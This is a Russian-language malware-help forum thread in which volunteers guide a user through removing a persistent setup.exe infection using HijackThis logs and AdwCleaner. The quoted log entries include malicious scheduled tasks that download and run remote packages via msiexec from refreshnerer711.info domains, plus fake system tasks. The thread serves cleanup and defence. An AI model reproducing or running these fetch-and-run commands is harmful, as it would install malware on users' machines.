Logame Опубликовано 1 февраля, 2019 Опубликовано 1 февраля, 2019 Доброй ночи,возникла проблема с вирусом setup.exe который блочит антивирусы и не даёт себя удалить,после удаления постоянно восстанавливается. Расположен в C:\Windows\SysWOW64\InstallShield\x32 изза него постоянно зависает Браузер. Помогите с проблемой!
thyrex Опубликовано 1 февраля, 2019 Опубликовано 1 февраля, 2019 Порядок оформления запроса о помощи Логи прикрепите к следующему сообщению в данной теме.
Logame Опубликовано 3 февраля, 2019 Автор Опубликовано 3 февраля, 2019 Порядок оформления запроса о помощи Логи прикрепите к следующему сообщению в данной теме. CollectionLog-2019.02.03-09.50.zip
regist Опубликовано 3 февраля, 2019 Опубликовано 3 февраля, 2019 "Пофиксите" в HijackThis: O1 - Hosts: is damaged (contains NUL characters only) O4 - MSConfig\startupfolder: C:^Users^Logame^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Shortcut to Primary output from Start (Active).lnk [backup] => (lnk is corrupted) (2019/01/21) (file missing) O4 - MSConfig\startupreg: DAEMON Tools Pro Agent [command] = C:\Program Files\DAEMON Tools Pro\DTAgent.exe -autorun (HKCU) (2018/04/24) (file missing) O4 - MSConfig\startupreg: Discord [command] = C:\Users\Logame\AppData\Local\Discord\app-0.0.300\Discord.exe (HKCU) (2018/04/14) (file missing) O4 - MSConfig\startupreg: DriverPack Cloud [command] = C:\Program Files (x86)\DriverPack Cloud\DriverPackCloud.exe --run startup (HKLM) (2018/04/12) (file missing) O4 - MSConfig\startupreg: Gaijin.Net Agent [command] = C:\Users\Logame\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe (HKCU) (2019/01/09) (file missing) O4 - MSConfig\startupreg: MegaFon_MegaFonInternet [command] = C:\Program Files (x86)\MegaFon\MegaFon Internet\MegaFonInternet.exe /minimized (HKLM) (2019/01/21) (file missing) O4 - MSConfig\startupreg: Roox_YotaAccess_Modems [command] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (HKLM) (2019/01/21) (file missing) O4 - MSConfig\startupreg: Scartel_YotaAccess_Modems [command] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (HKLM) (2019/01/21) (file missing) O4 - MSConfig\startupreg: YoutubeDownloader [command] = C:\Users\Logame\AppData\Roaming\YoutubeDownloader\python\pythonw.exe "start.pyc" ml3 (HKCU) (2019/01/21) (file missing) O4 - MSConfig\startupreg: YoutubeDownloader_upd [command] = C:\Users\Logame\AppData\Roaming\YoutubeDownloader_upd\python\pythonw.exe "start.pyc" ml3 (HKCU) (2019/01/21) O4-32 - HKLM\..\Run: [Roox_YotaAccess_Modems] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (file missing) O22 - Task: BlueStacksHelper - C:\Logame\Programm\Новая папка\BlueStacks\Client\Helper\BlueStacksHelper.exe (file missing) O22 - Task: \Microsoft\Windows\Services\WindowsUpdate32 - C:\Windows\srv_ext.exe --run (file missing) O22 - Task: \Microsoft\Windows\WindowsBackup\WindowsBackupTask - C:\Windows\winmain64.exe --run --sh (file missing) O22 - Task: {5008EF5A-9901-78AF-86FF-C6A75151CCC4} - C:\Windows\system32\msiexec.exe /package https://refreshnerer711.info/5b8Y14adu7Z.s1L -q O22 - Task: {B46739DC-95A0-0F69-3A7F-DE9C89BB2D6E} - C:\Windows\SysWOW64\loAN.exe /q -package https://refreshnerer711rb.info/vIQBca2OuvKV.0S4 сделайте свежие логи из обычного режима. + Скачайте AdwCleaner и сохраните его на Рабочем столе. Запустите его через правую кн. мыши от имени администратора, нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования. Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[s00].txt. Прикрепите отчет к своему следующему сообщению.
Logame Опубликовано 3 февраля, 2019 Автор Опубликовано 3 февраля, 2019 "Пофиксите" в HijackThis: O1 - Hosts: is damaged (contains NUL characters only) O4 - MSConfig\startupfolder: C:^Users^Logame^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Shortcut to Primary output from Start (Active).lnk [backup] => (lnk is corrupted) (2019/01/21) (file missing) O4 - MSConfig\startupreg: DAEMON Tools Pro Agent [command] = C:\Program Files\DAEMON Tools Pro\DTAgent.exe -autorun (HKCU) (2018/04/24) (file missing) O4 - MSConfig\startupreg: Discord [command] = C:\Users\Logame\AppData\Local\Discord\app-0.0.300\Discord.exe (HKCU) (2018/04/14) (file missing) O4 - MSConfig\startupreg: DriverPack Cloud [command] = C:\Program Files (x86)\DriverPack Cloud\DriverPackCloud.exe --run startup (HKLM) (2018/04/12) (file missing) O4 - MSConfig\startupreg: Gaijin.Net Agent [command] = C:\Users\Logame\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe (HKCU) (2019/01/09) (file missing) O4 - MSConfig\startupreg: MegaFon_MegaFonInternet [command] = C:\Program Files (x86)\MegaFon\MegaFon Internet\MegaFonInternet.exe /minimized (HKLM) (2019/01/21) (file missing) O4 - MSConfig\startupreg: Roox_YotaAccess_Modems [command] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (HKLM) (2019/01/21) (file missing) O4 - MSConfig\startupreg: Scartel_YotaAccess_Modems [command] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (HKLM) (2019/01/21) (file missing) O4 - MSConfig\startupreg: YoutubeDownloader [command] = C:\Users\Logame\AppData\Roaming\YoutubeDownloader\python\pythonw.exe "start.pyc" ml3 (HKCU) (2019/01/21) (file missing) O4 - MSConfig\startupreg: YoutubeDownloader_upd [command] = C:\Users\Logame\AppData\Roaming\YoutubeDownloader_upd\python\pythonw.exe "start.pyc" ml3 (HKCU) (2019/01/21) O4-32 - HKLM\..\Run: [Roox_YotaAccess_Modems] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (file missing) O22 - Task: BlueStacksHelper - C:\Logame\Programm\Новая папка\BlueStacks\Client\Helper\BlueStacksHelper.exe (file missing) O22 - Task: \Microsoft\Windows\Services\WindowsUpdate32 - C:\Windows\srv_ext.exe --run (file missing) O22 - Task: \Microsoft\Windows\WindowsBackup\WindowsBackupTask - C:\Windows\winmain64.exe --run --sh (file missing) O22 - Task: {5008EF5A-9901-78AF-86FF-C6A75151CCC4} - C:\Windows\system32\msiexec.exe /package https://refreshnerer711.info/5b8Y14adu7Z.s1L -q O22 - Task: {B46739DC-95A0-0F69-3A7F-DE9C89BB2D6E} - C:\Windows\SysWOW64\loAN.exe /q -package https://refreshnerer711rb.info/vIQBca2OuvKV.0S4 сделайте свежие логи из обычного режима. + Скачайте AdwCleaner и сохраните его на Рабочем столе. Запустите его через правую кн. мыши от имени администратора, нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования. Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[s00].txt. Прикрепите отчет к своему следующему сообщению. CollectionLog-2019.02.03-20.45.zip AdwCleanerS02.txt
regist Опубликовано 3 февраля, 2019 Опубликовано 3 февраля, 2019 (изменено) 1) Не надо заниматься оверковтингом. 2) деинсталируйте HitmanPro 3.8 [20180513]-->"C:\Program Files\HitmanPro\HitmanPro.exe" /uninstall 3) Удалите остатки avast.4) "Пофиксите" в HijackThis: O4 - MSConfig\startupfolder: C:^Users^Logame^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Shortcut to Primary output from Start (Active).lnk [backup] => (lnk is corrupted) (2019/01/21) (file missing) O4 - MSConfig\startupreg: DAEMON Tools Pro Agent [command] = C:\Program Files\DAEMON Tools Pro\DTAgent.exe -autorun (HKCU) (2018/04/24) (file missing) O4 - MSConfig\startupreg: MegaFon_MegaFonInternet [command] = C:\Program Files (x86)\MegaFon\MegaFon Internet\MegaFonInternet.exe /minimized (HKLM) (2019/01/21) (file missing) O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)5) Проверьте этот файл на virustotal C:\Windows\srv_ext.exeкнопка Выбрать файл (Choose File) - ищете нужный файл у вас в системе - Открыть (Browse) - Проверить (Scan it!). Нажать на кнопку Повторить анализ (Reanalyse) если будет. Дождитесь результата . Ссылку на результат (то, что будет в адресной строке в браузере) копируете и выкладываете в теме. 6) Запустите повторно AdwCleaner (by Malwarebytes) (программу необходимо запускать через правую кн. мыши от имени администратора). В меню Настройки включите дополнительно в разделе Базовые действия: Сбросить политики IE Сбросить политики Chrome В меню Панель управления нажмите Сканировать. По окончании нажмите кнопку Очистить и восстановить и дождитесь окончания удаления. Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt (где x - любая цифра). Прикрепите отчет к своему следующему сообщению Внимание: Для успешного удаления нужна перезагрузка компьютера!!!. Подробнее читайте в этом руководстве. Изменено 4 февраля, 2019 пользователем Sandor
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти